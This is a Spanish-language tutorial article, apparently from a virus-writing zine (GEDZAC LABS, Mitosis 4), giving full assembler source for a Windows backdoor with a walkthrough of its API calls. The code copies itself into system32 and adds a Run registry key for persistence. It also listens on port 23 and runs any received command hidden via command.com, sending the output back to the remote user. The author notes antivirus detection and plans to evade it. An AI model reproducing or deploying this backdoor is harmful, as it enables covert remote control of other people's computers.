<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style100 {font-size: 14px; color: #0066CC; font-weight: bold; font-family: "Courier New", Courier, monospace;}
.style142 {color: #0066cc}
.style143 {color: #999999}
.style145 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #0066cc; }


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Backdoor basico en ASM</span></span><span class="style55"><br>
      #Autor: <strong>Slayer<em></em></strong></span><br>
    </p>
</div>
  <div align="left" class="style55">
    <p align="justify">Este articulo trata de c&oacute;mo  crear un shellbackdoor en assembler para Windows. Bueno si ya leyeron el  art&iacute;culo sobre la creaci&oacute;n de un servidor b&aacute;sico en ASM este art&iacute;culo les ser&aacute;  mucho m&aacute;s f&aacute;cil de comprender.Desglosaremos las funciones  del backdoor para que vayamos de forma mas ordenada.Nota: la mec&aacute;nica ser&aacute; la siguiente desglosar los pasos a seguir,  veremos el c&oacute;digo fuente con los comentarios, y porultimo analizar el c&oacute;digo de las funciones m&aacute;s relevantes.</p>
    <p align="left"><br>
      ----------------------------------------------------------<br>
      <br>
      <span class="style55 style142">Pasos a seguir:<br>
      <br>
      1.. Obtener ruta donde nuestra aplicaci&oacute;n es  ejecutada<br>
      1.1 Obtener ruta del sistema<br>
      1.2 Copiarnos a la carpeta del sistema<br>
      1.3 Crear llave de registro para nuestra residencia<br>
      2.. Iniciar el socket y todo lo que implica  poner el socket a la escucha de un puerto recibir y enviar informaci&oacute;n<br>
      3.. Redireccionar la ejecuci&oacute;n de comandos  D.O.S a un archivo de texto plano<br>
      3.1 Leer el archivo creado<br>
      3.2 Enviar el resultado de la lectura <br>
      3.3 Eliminar el archivo anterior mente creado</span><span class="style62"><br>
      </span><br>
      <br>
      ----------------------------------------------------------<br>
      <br>
      <br>
      <span class="style143">;&lt;-  -- -------- Codigo completo <br>
      <br>
      .486p<br>
      .model  flat,stdcall<br>
      option  casemap:none<br>
      include  windows.inc <br>
      include  wsock32.inc <br>
      include  kernel32.inc <br>
      include  advapi32.inc<br>
      includelib  advapi32.lib <br>
      includelib  wsock32.lib <br>
      includelib  kernel32.lib <br>
      <br>
      <br>
      .data <br>
      yo db 255 dup (?) ;ruta donde nos ejecutamos<br>
      sys  db 255 dup (?) ;ruta de la carpeta  system32<br>
      otro db  "\backone.exe",0 ;nombre que tendra nuestra  copia<br>
      llave db 'Software\Microsoft\Windows\CurrentVersion\Run\',0 ;llave de  registro<br>
      root  db "r0ot@vxd :",0  ;cadena <br>
      wea  db " ",13,10 <br>
      <br>
      ;&lt;--------- para  ejecutar comandos D.O.S -----|<br>
      a db  "command.com /c ",0 <br>
      b db " dir ",0<br>
      arch  db "&gt;c:\auto.txt",0 <br>
      ;&lt;--------------------------------------------|<br>
      welcome db  "Bienvenido a mula socket",13,10 ; saludo  de bienvenida<br>
      final db 512 dup (0) ;donde  almacenaremos lo recibido<br>
      carac db 1 ;caracter a caracter lo que  recibimos<br>
      <br>
      bread dd ? <br>
      result  dd ?<br>
      fsize  dd ?<br>
      fhandle  dd ?<br>
      archivo db  "c:\auto.txt",0<br>
      <br>
      .data?<br>
      s1 SOCKET ? ;puntero al socket 1<br>
      s2 SOCKET ? ;puntero al socket 2 <br>
      sin1 sockaddr_in  &lt;&gt; ;estructura  del socket 1<br>
      sin2 sockaddr_in  &lt;&gt; ;estructura  del socket 2<br>
      wsaData WSADATA  &lt;&gt; ; estructura del winsock segun version  presente<br>
      temp dd ? ;variable sin valor <br>
      com  db 100 dup (?)<br>
      .code<br>
      inicio:<br>
      ;&lt;1.<br>
      invoke  GetModuleFileName,0, addr  yo,255 ;obtenemos la ruta donde nos ejecutamos<br>
      ;&lt;1.1<br>
      invoke  GetSystemDirectory,addr sys,255 ;obtenemos la ruta system32<br>
      <br>
      invoke  lstrcat,addr sys, addr otro  ;concatenamos las cadenas para obtener la ruta completa<br>
      ;donde nos copiaremos<br>
      ;&lt;1.2 <br>
      invoke  CopyFile,addr yo,addr sys,0 ;por  desgracia esta rutina es detectada por los av.<br>
      ;pero por ahora a modo de ejemplo es valida mas adelante ver<br>
      ;como solucionar el problema<br>
      <br>
      ;&lt;1.3 <br>
      invoke  RegSetValueA,080000002h, addr  llave,1,addr sys, eax ;creamos la llave de registro para nuestra<br>
      ;recidencia <br>
      ;&lt;Fin 1.x<br>
      <br>
      <br>
      ;&lt;2. iniciar el socket <br>
      invoke  WSAStartup,0101h,ADDR wsaData  ;inbocamos la libreria<br>
      invoke  socket,PF_INET,SOCK_STREAM,0 ;creamos el socket<br>
      mov  s1,eax ;pasamos el valor de retorno a la variable s1  (puntero o descriptor de nuestro socket)<br>
      mov  ax,AF_INET ;formato de la direccion <br>
      mov  sin1.sin_family,ax ;llenamos la estructura AF_INET<br>
      xor  eax,eax ;vasiamos el registro<br>
      mov  sin1.sin_addr,eax  ;aqu&iacute; tenemos la direcci&oacute;n de nuestro guesped<br>
      invoke  htons,23 ;Telnet port (convertimos el valor con htons)<br>
      mov  sin1.sin_port,ax ; pasamos el puerto convertido a un  valor aceptado por la maquina<br>
      invoke  bind,s1,ADDR sin1,SIZEOF sockaddr_in ; arraigamos toda la estructura y par&aacute;metros  al uso local<br>
      cmp  eax,SOCKET_ERROR  ;comparamos si ocurre un error<br>
      jne  @F ;jne salta si no es = <br>
      call  WSACleanup ;cierra la iniciaci&oacute;n previa <br>
      xor  eax,eax<br>
      ret<br>
      @@:<br>
      invoke  listen,s1,1 ;ponemos nuestro socket  a la escucha<br>
      next_user:<br>
      invoke  closesocket,s2<br>
      mov  eax,SIZEOF sockaddr_in<br>
      mov  temp,eax<br>
      invoke  accept,s1,ADDR sin2,ADDR temp<br>
      mov  s2,eax<br>
      invoke  send,s2,ADDR welcome,SIZEOF  welcome,0<br>
      invoke  send,s2,ADDR wea,SIZEOF wea,0<br>
      invoke  send,s2,ADDR root,SIZEOF root,0<br>
      next:<br>
      invoke  recv,s2, addr carac,1,0<br>
      or eax,eax<br>
      jz next_user<br>
      cmp  eax,SOCKET_ERROR<br>
      je next_user<br>
      cmp  carac,"_"  ; si es "_" procedemos a ejecutar la orden <br>
      je  listo <br>
      invoke  lstrcat,addr final, addr carac ;concatenamos los caracteres recibidos<br>
      jmp  next<br>
      ;&lt;Fin 2.x  funciones del socket<br>
      @@:<br>
      listo:<br>
      ;&lt;3. Ejecutamos  el comando y lo almacenamos en c:\auto.txt<br>
      ;&lt; de esta forma :  command.com /c "comando" &gt;c:\auto.txt,SW_HIDE<br>
      invoke  lstrcpy,addr com, addr a ;comando  command.com /c<br>
      invoke  lstrcat,addr com, addr final; este es el comando que llego por telnet<br>
      invoke  lstrcat,addr com, addr arch<br>
      invoke  WinExec,addr com,SW_HIDE<br>
      <br>
      mov  carac,0<br>
      mov  final,0<br>
      mov  com,0<br>
      <br>
      lerr:<br>
      <br>
      ;&lt;3.1 leer  archivo<br>
      push  0 ;htemplate<br>
      push  080h ;Dwflags  and atribbutes NORMAL_ATRIBUTE<br>
      push  3<br>
      push  0 ;security_atributes<br>
      push  2 ;dwShareMode <br>
      push  80000000h ;GENERIC_READ<br>
      push  offset archivo<br>
      call  CreateFileA<br>
      <br>
      cmp  eax,0ffffffffh<br>
      je lerr<br>
      mov fhandle,eax<br>
      push  0<br>
      push  fhandle<br>
      Call GetFileSize<br>
      mov fsize,eax <br>
      push  fsize<br>
      push  0<br>
      call  GlobalAlloc<br>
      mov memptr,eax <br>
      push  0<br>
      push  offset bread <br>
      push  fsize <br>
      push  result <br>
      push  fhandle <br>
      Call ReadFile <br>
      <br>
      ;&lt;3.2 enviamos el  resultado de la lectura <br>
      push  0 <br>
      push  fsize<br>
      push  result<br>
      push  s2<br>
      call  send<br>
      <br>
      <br>
      <br>
      push  fhandle<br>
      call  CloseHandle <br>
      push  result<br>
      call  GlobalFree<br>
      <br>
      <br>
      invoke  send,s2,ADDR wea,SIZEOF wea,0<br>
      invoke  send,s2,ADDR root,SIZEOF root,0<br>
      <br>
      ;&lt;3.3 eliminamos  el archivo anteriormente creado<br>
      push  offset archivo<br>
      call  DeleteFileA<br>
      <br>
      <br>
      mov  carac,0<br>
      mov  final,0<br>
      mov  com,0<br>
      jmp  next<br>
      <br>
      end  inicio<br>
      <br>
      ;&lt;- ------- Fin del c&oacute;digo</span><br>
      <br>
      <br>
      <span class="style145">An&aacute;lisis </span><br>
      <br>
      <br>
      Viendo el c&oacute;digo no hay  mucho que explicar realmente, lo mas relevante que es lo relacionado con el socket ya esta explicado en el articulo anterior. Dado  esto explicare el uso de las apis involucradas en el c&oacute;digo.
      GetModuleFileName,NULL,  addr Buffer,225 : esta  funci&oacute;n extrae el directorio mas el nombre
      de la aplicaci&oacute;n, y la devolver&aacute; en la variable Buffer. 255  significa la longitud m&aacute;xima<br>
      de caracteres que va a devolver.<br>
      <br>
      <span class="style143"><br>
      invoke  GetSystemDirectory,addr Buffer,255</span> :esta api nos devolver&aacute; la ruta de la  carpeta system32
      cuyo resultado se almacenara en buffer. <br>
      <br>
      <br>
      <span class="style143">invoke  RegSetValueA,080000002h, addr  llave,1,addr sys,0 : esta funci&oacute;n la usaremos para crear <br>
      una llave en el registro para nuestra sucesiva ejecuci&oacute;n tb podr&iacute;amos llamar a la funci&oacute;n de esta manera<br>
"invoke RegSetValueA,HKEY_LOCAL_MACHINE, addr llave,REG_SZ,addr sys,NULL"<br>
    <br>
    080000002h = HKEY_LOCAL_MACHINE<br>
    llave =  Software\Microsoft\Windows\CurrentVersion\Run\<br>
    1 = REG_SZ =  Cadena de texto de longitud fija<br>
    sys = la ruta de sytem32 + el nombre de  nuestra copia<br>
    0 = NULL<br>
      </span><br>
    <br>
    <span class="style143"><br>
    invoke  WinExec,addr com,SW_HIDE : esta funci&oacute;n ejecuta la aplicaci&oacute;n que queramos</span>
    creo que solo es compatible con aplicaciones de 16 bits justo para  lo que la usaremos en 
    nuestro caso.<br>
    <br>
    Como sabemos si abrimos la consola de comandos y escribimos algo asi:<br>
    dir c:\windows &gt;c:\hola.txt<br>
    <br>
    El resultado del comando dir se  almacenara en el archivo de texto en la ruta especificada.<br>
    bueno este es el m&eacute;todo en el cual basaremos nuestro backdoor. Para ejecutar un comando
    desde nuestra aplicaci&oacute;n  deber&iacute;amos entregar los par&aacute;metros de la siguiente forma<br>
    <br>
    command.com /c dir c:\windows &gt;c:\hola.txt<br>
    <br>
    Para conseguir este orden y entregar los par&aacute;metros de forma correcta 
    debemos concatenar o unir algunas variables que contendr&aacute;n nuestros  par&aacute;metros.<br>
    <br>
    <br>
    <span class="style143"><br>
    invoke  lstrcpy,addr com, addr a ;com es una variable a la cual le entregamos el primer  valor(command.com /c) <br>
    <br>
    invoke  lstrcat,addr com, addr final;ahora le agregamos el comando que recibamos del cliente (ejemplo dir) <br>
    <br>
    invoke  lstrcat,addr com, addr arch ; por ultimo entregamos el par&aacute;metro del archivo donde  almacenaremos<br>
    ;el comando (&gt;c:\hola.txt).<br>
    <br>
    invoke  WinExec,addr com,SW_HIDE ; ok al final ejecutamos el  comando contenido en la variable "com"<br>
    el par&aacute;metro SW_HIDE hace que dicho  comando se ejecute de forma oculta as&iacute; la ventana dos no se vera<br>
    y no habr&aacute; se&ntilde;al alguna.</span><br>
    <br>
    <span class="style143">push  0 ;htemplate<br>
    push  080h ;Dwflags  and atribbutes NORMAL_ATRIBUTE<br>
    push  3<br>
    push  0 ;security_atributes<br>
    push  2 ;dwShareMode <br>
    push  80000000h ;GENERIC_READ<br>
    push  offset archivo<br>
    call  CreateFileA :Crea, abre o trunca un fichero, pipe, recurso de comunicaci&oacute;n, <br>
    dispositivo de disco o consola. Devuelve un manipulador que puede ser usado  para acceder al objeto. <br>
    Tambi&eacute;n puede abrir y  retornar un manipulador a un directorio <br>
    <br>
    <br>
    push  0<br>
    push  fhandle ;  manejador que nos regresa la funci&oacute;n CreateFileA<br>
    Call GetFileSize : La funci&oacute;n GetFileSize devuelve el tama&ntilde;o, en bytes,  del fichero especificado. <br>
    <br>
    push  fsize<br>
    push  0<br>
    call  GlobalAlloc :La funci&oacute;n GlobalAlloc reserva el n&uacute;mero de bytes  de memoria <br>
    especificados desde el mont&oacute;n. En el entorno lineal del API Win32, <br>
    no hay diferencias entre el mont&oacute;n local y el global.<br>
    <br>
    <br>
    push  0<br>
    push  offset bread <br>
    push  fsize <br>
    push  result <br>
    push  fhandle <br>
    Call ReadFile :Lee datos desde un fichero,  comenzando en la posici&oacute;n indicada por el puntero del fichero.<br>
    Despu&eacute;s de que la operaci&oacute;n  de lectura ha sido completada, el puntero del fichero se ajusta seg&uacute;n el_<br>
    n&uacute;mero de bytes le&iacute;dos, a no ser que el  manipulador de fichero haya sido creado con el atributo de_<br>
    superposici&oacute;n (overlapped). Si el manipulador de  fichero es creado para entradas y salidas superpuestas_<br>
    (overlapped I/O), la aplicaci&oacute;n debe ajustar la  posici&oacute;n del puntero del fichero despu&eacute;s de la operaci&oacute;n_<br>
    de lectura.<br>
    </span><br>
    <br>
    <span class="style143">GlobalFree:la funci&oacute;n GlobalFree  libera el objeto de memoria gloabl e invalida su  manipulador. <br>
    <br>
    push  offset archivo<br>
    DeleteFileA :esta funcion elimina el archivo  especificado.</span> <br>
    <br>
    <br>
    Bueno estas son las apis impl&iacute;citas en el backdoor  que no fueron explicadas en el articulo anterior.<br>
    </p>
    <p align="justify"><br>
    Saludos<br>
    <br>
    <p align="justify"><br>
    <p align="right" class="style100">(C) Mitosis 4 - GEDZAC LABS<br>
</div>
</body>
</html>
